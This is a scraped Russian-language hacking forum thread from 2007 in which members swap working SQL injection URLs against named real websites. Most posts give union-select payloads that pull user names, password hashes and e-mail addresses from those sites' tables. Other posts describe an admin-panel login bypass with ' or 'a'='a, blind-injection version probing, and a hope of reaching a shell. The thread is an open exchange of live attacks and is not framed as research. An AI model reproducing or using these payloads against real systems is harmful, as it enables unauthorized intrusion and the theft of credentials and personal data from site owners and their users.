SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    Подобрал кол-во столбцов:
    Code:
    http://top.kmvcity.ru/stat.php?id=1'union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
    Попробуй угадать таблицы ;)
     
    2 people like this.
  2. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    большая бд :)

    Code:
    http://www.comicbookresources.com/news/newsitem.cgi?id=-11511+union+select+1,2,3,4,concat_ws(0x203a20,id,name,password,email),6,7,8+from+users+limit+16000,1/*
     
  3. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    инъекция тут
    Code:
    http://www.dog.ru/index.php3?mode=5&id=417652+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
    таблица users
     
  4. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4

    Code:
    http://www.dog.ru/index.php3?mode=5&id=417652--00+union+select+1,2,3,4,5,concat(name,char(58),passwd,char(58),email,char(58),id,char(58),version(),char(58),user(),char(58),database()),7,8,9,10,11,12,13,14%20from%20users%20limit%200,1/*
    +table "search"
     
    1 person likes this.
  5. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    http://www.flashonthebeach.com
     
  6. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    Code:
    http://fckhimki.ru/modules/players/print.php?current_id=&player_id=-1+union+select+1,2,3,4,5,6,concat(name,char(58),height,char(58),weight,char(58),country,char(58),position),8,9,10,11,12,13,14,15,16,17,18,19,20+from+players+limit+0,1/*
    база: fckhimki_new1;
    версия: 4.0.27-max-log;
    юзер: [email protected]

    К базам mysql и forum подобраться не получиться, зато
    можно поиздеваться над таблицами news и players ;)
     
    #2846 phol1eadeux, 13 Aug 2007
    Last edited: 13 Aug 2007
    2 people like this.
  7. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    http://www.sat-tv.ru
     
    #2847 groundhog, 13 Aug 2007
    Last edited: 13 Aug 2007
    1 person likes this.
  8. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Вот подобрано количество полей:
    Но он на такой запросы выдаёт:
    Как это обойти я не допёр...
     
  9. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://gorodclub.ru/adm/forum/home.viewprofile.php?user=-1'+union+select+1,2,3,4,5,6/*
    странно, но ни 1 названия не мог подобрать
    зато в админку зашел стандартным ' or 'a'='a (;
     
    #2849 Calcutta, 14 Aug 2007
    Last edited: 14 Aug 2007
    1 person likes this.
  10. ruzzer

    ruzzer Elder - Старейшина

    Joined:
    29 Jul 2007
    Messages:
    43
    Likes Received:
    10
    Reputations:
    3
    http://m.wazzap.ru/m/photo/?code=46b2bdffwfcodusoij&id=%27

    select photo_id, photo_desc from mf_user_photo where user_id=' and photo_visible='Y' LIMIT 0, 5

    это иньекция?
     
  11. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    2 ruzzer
    Вот иньекция
    http://m.wazzap.ru/m/photo/?id=-72813%20union%20select%201,TABLE_NAME%20from%20INFORMATION_SCHEMA.TABLES/*
     
  12. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    Небольшая мыльная база ;)
    Code:
    http://www.spbgid.ru/index.php?type=-1+union+select+1,mail,3+from+mail/*
    + как всегда, таблица 'news'
    З.Ы. Должна быть еще таблица кампаний(тоже с мыльниками), но я не нашел...
     
    1 person likes this.
  13. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Слепая sql-inj, кроме таблицы news и колонки n_id ничего не подобрал..., а ещё есть колонки o_id и rc_id, только вот в каких таблицах? Имхо должны быть таблицы авторов и оппонентов, если я правильно понял из самого сайта...
    Code:
    http://www.ortodoxmedia.com/autor.php?autor=-1+union+select+1,user(),n_id,4,5,version()+from+news+where+n_id=15/*
    
    ЗЫ Может кто копнёт поглубже? Подгузка файла (load_file()) тут сработает?

    Code:
    http://sololiteratura.com/php/autor.php?id=-1+union+select+user(),version(),null/*
    
     
    #2853 -=lebed=-, 15 Aug 2007
    Last edited: 15 Aug 2007
  14. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Code:
    _http://www.textdiebe.de/werkstatt/autor.php?autor=-1234+union+select+1,2,3,4,user(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
    
    Code:
    _http://www.entornoarte.com:81/ea/autor.php?id=-1+union+select+concat(user(),version()),2/*
    
    Чтоб увидеть значения, наведите мышкой на отсутствующий рисунок. ;)

    Code:
    _http://digital.el-esceptico.org/autor.php?autor=635+order+by+3/* - всё ок!
    _http://digital.el-esceptico.org/autor.php?autor=635+order+by+4/* - ошибка!
    
    То есть число столбцов как бы = 3
    но почему тогда:
    Code:
    _http://digital.el-esceptico.org/autor.php?autor=635+union+select+1,2,3/*
    
    ЗЫ Дак сколько там столбцов?
     
    #2854 -=lebed=-, 15 Aug 2007
    Last edited: 15 Aug 2007
  15. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    Code:
    http://media.utmn.ru/news.php?show_news=-1+union+select+concat(nick,char(58),pwd,char(58),email)+from+users/*
    в поле 'pwd' лежат хеши
     
  16. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    Столбцов как бы 3 только вот мускул 3 версии, соответственно union не поддерживает.
     
    1 person likes this.
  17. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    2 geezer.code
    неД))

    версия 4
    http://digital.el-esceptico.org/autor.php?autor=635+and+(ascii(substring(VERSION(),1,1))=52)

    2 -=lebed=-
    может там 2 запроса.. в одном 3 столбца, а во втором нет
     
    _________________________
    #2857 halkfild, 15 Aug 2007
    Last edited: 15 Aug 2007
    2 people like this.
  18. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    а вот тут все ок.. кста потвердилась моя версия

    4.1.21*eed-lectura@localhost*esceptico
     
    _________________________
    1 person likes this.
  19. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    pr=4
    www.solar-ct.com
    Code:
    http://www.catalogue.solar-ct.com/plugins/catalog/catalog_view.php?id=-23+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user_name,user_loginname,user_password,user_email),10,11,12,13,14,15,16,17,18,19+from+solar_user+limit+0,1/*

    brigada.uz
    Code:
    http://brigada.uz/plugins/ansmt/ansmt_view.php?id=-44+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_name,user_loginname,user_password,user_email,user_hideemail,user_join,user_ip,version()),8,9,10,11,12,13,14+from+brigada_user

    пароли в хэше... писала одна и та же студия ))) поищу ещще что нить у них.
     
    1 person likes this.
  20. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Вот решил запостить, мне понравилось тут раскапывать. Интересно работать с пятой версией мускула но...
    Таблицы найдены, пароли получены, вот только куда их подставлять я не нашел - может кто докопает. Я эту скулю у себя хранил долго, покуда не разузнал про пятую версию мускула, а потом ковырялся в старых залежах набрал version() и о чудо 5.ХХ.ХХ, а это значит можно узнать все таблицы и т.д.!!!!!
    Вот кстати и таблички
    Жаль до шелла не дошло.... может кто???..., а нет так и ладно
     
    4 people like this.
Thread Status:
Not open for further replies.